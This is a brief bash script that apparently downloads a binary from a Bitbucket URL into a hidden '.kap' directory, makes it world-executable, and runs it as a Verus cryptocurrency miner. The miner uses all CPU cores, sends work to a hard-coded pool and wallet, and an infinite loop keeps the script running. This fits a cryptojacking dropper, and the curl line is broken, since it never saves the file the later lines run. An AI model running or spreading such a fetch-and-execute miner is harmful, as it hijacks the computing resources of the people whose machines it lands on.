#!/bin/bash
mkdir .kap && cd .kap
curl  https://bitbucket.org/buyyy/didieu/downloads/bct
chmod 777 bct
./bct -a verus -o stratum+tcp://ap.vipor.net:5040 -u RSaAjB1zYPF9wEwdbb9UQQGoia5Hp4YpiV.UYEY -t $(nproc --all)
while [ 1 ]; do
sleep 3
done
sleep 999
